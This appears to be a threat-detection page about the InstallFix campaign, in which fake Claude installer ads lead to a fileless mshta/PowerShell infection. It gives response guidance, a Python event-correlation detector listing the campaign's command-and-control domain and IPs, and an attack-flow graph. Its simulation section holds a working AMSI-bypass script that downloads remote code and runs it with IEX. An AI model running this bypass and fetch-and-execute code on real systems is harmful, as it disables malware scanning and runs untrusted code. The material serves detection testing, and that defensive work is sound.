SOC Prime Bias: Medium

07 May 2026 18:38

InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The InstallFix campaign spreads malware through malicious Google Ads that imitate Claude AI installer pages. Victims are persuaded to paste and run a PowerShell command that invokes mshta.exe to retrieve a polyglot ZIP/HTA file, which launches a multi-stage, fileless infection chain. The payload disables TLS certificate validation and patches AMSI, downloads additional code from a victim-specific command-and-control domain, and establishes persistence through scheduled tasks. The operation has targeted organizations across multiple industries and regions worldwide.

Investigation

Researchers traced the full execution flow from the fake installer page through mshta.exe, VBScript, and several layers of encoded PowerShell. Deobfuscation showed that the malware generated a unique identifier for each victim and used it to build a host-specific command-and-control URL. Network telemetry revealed outbound communication to multiple malicious domains and IP addresses. Although the final payload was not fully recovered, observed behavior suggested data collection and exfiltration activity.

Mitigation

Defenders should block the identified malicious domains and IP addresses and restrict mshta.exe and other legacy scripting hosts wherever possible, for example with AppLocker or WDAC rules that deny mshta.exe to standard users. Endpoint security controls should be tuned to detect AMSI bypass attempts and tampering with certificate validation. Organizations should also apply strict URL filtering to Google Ads click-throughs that land on software installer pages. User awareness remains critical, especially the risk of running commands copied from sponsored search results or unverified sources.

Response

Security teams should alert on process chains in which mshta.exe launches cmd.exe, powershell.exe, or script interpreters with suspicious remote URLs; Sysmon event 1 or Security event 4688 with command-line auditing enabled provides both the parent/child relationship and the URL. Those events should be correlated with scheduled task creation (schtasks.exe /create, or Security event 4698) and outbound connections to the known command-and-control infrastructure. If activity is confirmed, defenders should contain the host, terminate the malicious processes, and remove any persistence mechanisms such as scheduled tasks. A forensic review should then be performed to identify any remaining fileless payload components; PowerShell Script Block Logging (event 4104) captures the decoded stages that never touch disk.
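One way to express the correlation above as code, as an added example rather than a SOC Prime rule: the script below runs three checks (mshta.exe given a remote URL or spawning a shell/script host, scheduled task creation, a connection to the listed C2 domain or IPs) over Sysmon-style events and raises per host only when the mshta chain is followed within a time window by persistence or C2 traffic. The event schema (event_id, Image, ParentImage, CommandLine, DestinationIp, DestinationHostname, host, ts) and the sample events are constructed for this example; the indicators are the ones in the attack flow on this page.

```python
"""Correlate the mshta chain, persistence and C2 signals the response guidance lists.

Added example, not SOC Prime's detection content. Events are CONSTRUCTED dicts
with a Sysmon-like shape: event_id 1 (process create: Image, ParentImage,
CommandLine), event_id 3 (network connect: DestinationIp, DestinationHostname),
plus host and ts (epoch seconds). Field names are an assumption.
"""
from collections import defaultdict

C2_DOMAINS = {"oakenfjrod.ru"}                       # from the attack flow on this page
C2_IPS = {"104.21.0.95", "185.177.239.255"}          # from the attack flow on this page
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
URL_MARKERS = ("http://", "https://")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_mshta_chain(ev: dict) -> bool:
    """mshta.exe handed a remote URL, or mshta.exe spawning a shell / script host."""
    if ev.get("event_id") != 1:
        return False
    image = _basename(ev.get("Image", ""))
    parent = _basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "").lower()
    has_url = any(marker in cmd for marker in URL_MARKERS)
    return (image == "mshta.exe" and has_url) or (parent == "mshta.exe" and image in SCRIPT_HOSTS)


def is_task_creation(ev: dict) -> bool:
    """schtasks /create in a process event, or Security 4698 (a scheduled task was created)."""
    if ev.get("event_id") == 4698:
        return True
    if ev.get("event_id") != 1:
        return False
    return _basename(ev.get("Image", "")) == "schtasks.exe" and "/create" in ev.get("CommandLine", "").lower()


def is_c2_connection(ev: dict) -> bool:
    """Network connect to the published C2 domain or IPs."""
    if ev.get("event_id") != 3:
        return False
    host = ev.get("DestinationHostname", "").lower().rstrip(".")
    return ev.get("DestinationIp") in C2_IPS or host in C2_DOMAINS


SIGNALS = {"mshta_chain": is_mshta_chain, "task_created": is_task_creation, "c2_connection": is_c2_connection}


def correlate(events: list, window_s: int = 900) -> dict:
    """Return {host: sorted signal names} for hosts where the first mshta chain event
    is followed within window_s seconds by task creation and/or C2 traffic.
    A lone mshta event is not enough: something later in the chain must confirm it."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host[ev["host"]].append(ev)
    alerts = {}
    for host, evs in by_host.items():
        anchors = [e["ts"] for e in evs if is_mshta_chain(e)]
        if not anchors:
            continue
        t0 = anchors[0]
        hits = set()
        for e in evs:
            if t0 <= e["ts"] <= t0 + window_s:
                hits.update(name for name, check in SIGNALS.items() if check(e))
        if hits & {"task_created", "c2_connection"}:
            alerts[host] = sorted(hits)
    return alerts


SYS32 = r"C:\Windows\System32"
PS = SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"host": "WS01", "ts": 1001, "event_id": 1, "Image": SYS32 + r"\mshta.exe", "ParentImage": PS,
     "CommandLine": "mshta https://installer.example.invalid/claude"},
    {"host": "WS01", "ts": 1002, "event_id": 1, "Image": SYS32 + r"\cmd.exe", "ParentImage": SYS32 + r"\mshta.exe",
     "CommandLine": "cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA"},
    {"host": "WS01", "ts": 1020, "event_id": 1, "Image": SYS32 + r"\schtasks.exe", "ParentImage": PS,
     "CommandLine": 'schtasks /create /sc onlogon /tn Updater /tr "powershell -nop -w hidden -enc SQBFAFgA"'},
    {"host": "WS01", "ts": 1030, "event_id": 3, "Image": PS,
     "DestinationIp": "185.177.239.255", "DestinationHostname": "oakenfjrod.ru", "DestinationPort": 443},
    # benign look-alike: a local HTA with no URL, and an unrelated backup task
    {"host": "WS02", "ts": 2000, "event_id": 1, "Image": SYS32 + r"\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta C:\Tools\dashboard.hta"},
    {"host": "WS02", "ts": 2010, "event_id": 1, "Image": SYS32 + r"\schtasks.exe", "ParentImage": SYS32 + r"\cmd.exe",
     "CommandLine": "schtasks /create /tn Backup /sc daily /tr backup.cmd"},
]

if __name__ == "__main__":
    print(correlate(SAMPLE_EVENTS))   # only WS01 fires; WS02's local HTA never anchors a chain
```

The window anchors on the first mshta event per host; shrinking window_s to a few minutes cuts noise on hosts where admins legitimately create tasks, at the cost of missing a stager that sleeps before registering persistence.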

Attack Flow

    graph TB
        %% Class definitions
        classDef action fill:#99ccff
        classDef tool fill:#cccccc
        classDef process fill:#ffcc99
        classDef malware fill:#ff9999

        %% Nodes – Actions
        recon_google_ads["<b>Action</b> – <b>T1593.002 Search Open Websites/Domains: Search Engines</b><br/><b>Description</b>: Adversary places malicious sponsored results on Google to lure victims searching for Claude AI."]
        class recon_google_ads action
        initial_access_phishing["<b>Action</b> – <b>T1566.002 Phishing: Spearphishing Link</b><br/><b>Description</b>: Victim clicks a malicious ad and is redirected to a fake Claude installer page that hosts a PowerShell command."]
        class initial_access_phishing action
        user_exec_copy_paste["<b>Action</b> – <b>T1204.004 User Execution: Malicious Copy and Paste</b><br/><b>Description</b>: Victim copies the displayed PowerShell command and runs it in a console."]
        class user_exec_copy_paste action
        execution_mshta["<b>Action</b> – <b>T1218.005 System Binary Proxy Execution: Mshta</b><br/><b>Description</b>: PowerShell invokes mshta.exe with a URL to a polyglot HTA/MSIX bundle."]
        class execution_mshta action
        execution_htavbscript["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b><br/><b>Description</b>: HTA VBScript runs via mshta, uses Shell.Application COM object to launch cmd.exe."]
        class execution_htavbscript action
        execution_powershell_stager["<b>Action</b> – <b>T1140 Deobfuscate/Decode Files or Information</b><br/><b>Description</b>: PowerShell stager is base64-encoded, split into variables and XOR-decoded with key “AMSI_RESULT_NOT_DETECTED”."]
        class execution_powershell_stager action
        defense_evasion_amsi["<b>Action</b> – <b>T1211 Exploitation for Defense Evasion</b><br/><b>Description</b>: Script disables SSL certificate validation and patches AMSI to bypass detection."]
        class defense_evasion_amsi action
        persistence_scheduled_task["<b>Action</b> – <b>T1053 Scheduled Task/Job</b><br/><b>Description</b>: Malware creates a scheduled task to relaunch the payload after system reboot."]
        class persistence_scheduled_task action
        collection_automated["<b>Action</b> – <b>T1119 Automated Collection</b><br/><b>Description</b>: Collects e-wallet application data and browser data from the compromised host."]
        class collection_automated action
        exfiltration_automated["<b>Action</b> – <b>T1020 Automated Exfiltration</b> & <b>T1029 Scheduled Transfer</b><br/><b>Description</b>: Collected data is sent to attacker-controlled domains such as https://oakenfjrod.ru and IPs 104.21.0.95, 185.177.239.255."]
        class exfiltration_automated action

        %% Nodes – Tools / Processes
        tool_mshta["<b>Tool</b> – <b>Name</b>: mshta.exe<br/><b>Purpose</b>: Executes HTML Application files."]
        class tool_mshta tool
        tool_cmd["<b>Tool</b> – <b>Name</b>: cmd.exe<br/><b>Purpose</b>: Windows command-line interpreter."]
        class tool_cmd tool
        tool_powershell["<b>Tool</b> – <b>Name</b>: PowerShell<br/><b>Purpose</b>: Scripting engine used for payload delivery and decoding."]
        class tool_powershell tool
        tool_amsi_patch["<b>Tool</b> – <b>Name</b>: AMSI Patch<br/><b>Purpose</b>: Alters Antimalware Scan Interface to suppress detection."]
        class tool_amsi_patch tool
        tool_schtasks["<b>Tool</b> – <b>Name</b>: schtasks.exe<br/><b>Purpose</b>: Creates and manages scheduled tasks."]
        class tool_schtasks tool

        %% Connections – Flow
        recon_google_ads -->|leads_to| initial_access_phishing
        initial_access_phishing -->|leads_to| user_exec_copy_paste
        user_exec_copy_paste -->|executes| tool_powershell
        tool_powershell -->|calls| execution_mshta
        execution_mshta -->|uses| tool_mshta
        execution_mshta -->|downloads| execution_htavbscript
        execution_htavbscript -->|spawns| tool_cmd
        tool_cmd -->|runs| execution_powershell_stager
        execution_powershell_stager -->|uses| tool_powershell
        execution_powershell_stager -->|applies| defense_evasion_amsi
        defense_evasion_amsi -->|uses| tool_amsi_patch
        defense_evasion_amsi -->|creates| persistence_scheduled_task
        persistence_scheduled_task -->|uses| tool_schtasks
        persistence_scheduled_task -->|enables| collection_automated
        collection_automated -->|triggers| exfiltration_automated

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:
    The simulation reproduces the PowerShell stage of the chain. A script obtained via a spear‑phishing link (T1566.002) downloads a second-stage payload from an attacker-controlled server. To avoid AMSI detection it flips the private static field amsiInitFailed on System.Management.Automation.AmsiUtils (the bypass marker step 2 refers to; the real stager additionally carries the string AMSI_RESULT_NOT_DETECTED as its XOR key), then executes the downloaded code with IEX. The entire inner script is UTF‑16LE/Base64‑encoded and launched with powershell.exe -EncodedCommand, satisfying all three selector strings in the Sigma rule. Note that the process command line only shows the Base64 blob; the inner strings surface in PowerShell Script Block Logging (event 4104), so that log source must be enabled on the test host for the rule to fire.

    Step‑by‑step:

    1. Define the payload download (a simple PowerShell one‑liner that writes a file, hosted on a lab server you control).
    2. Set the private static field amsiInitFailed to true (the AMSI bypass marker).
    3. Execute the downloaded payload via IEX.
    4. Launch the whole chain with powershell.exe -EncodedCommand ….
  • Regression Test Script:

    # InstallFix‑style PowerShell attack simulation
    # -------------------------------------------------
    # Run only on an isolated lab host. Replace http://example.com/payload.ps1 with a
    # lab server you control that serves a harmless one-liner (e.g. one that writes a file).
    # 1. Define the malicious one‑liner. Inside the double-quoted here-string every `$`
    #    is escaped with a backtick so the child powershell.exe expands the variables,
    #    not this script (an unescaped $true would be baked in as the bare word True).
    #    The method chain stays on one line: PowerShell does not continue a statement
    #    on a following line that begins with ".".
    $malicious = @"
    `$bypass = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static')
    `$bypass.SetValue(`$null,`$true)
    IEX (New-Object Net.WebClient).DownloadString('http://example.com/payload.ps1')
    "@
    
    # 2. Encode the script as UTF‑16LE and then Base64, the form -EncodedCommand expects
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($malicious)
    $encoded = [Convert]::ToBase64String($bytes)
    
    # 3. Execute via powershell.exe with the -EncodedCommand flag. Defender's AMSI signature
    #    for the amsiInitFailed pattern may block the child script; that block event is
    #    itself useful telemetry for the test.
    $command = "powershell.exe -NoProfile -EncodedCommand $encoded"
    Write-Host "Launching malicious PowerShell..."
    Invoke-Expression $command
  • Cleanup Commands:

    # Stop any child PowerShell still running (but not the console this cleanup runs in)
    # and remove the dropped file
    Get-Process -Name powershell -ErrorAction SilentlyContinue |
        Where-Object { $_.Id -ne $PID } |
        Stop-Process -Force
    Remove-Item -Path "$env:TEMP\payload.ps1" -ErrorAction SilentlyContinue
    Write-Host "Cleanup complete."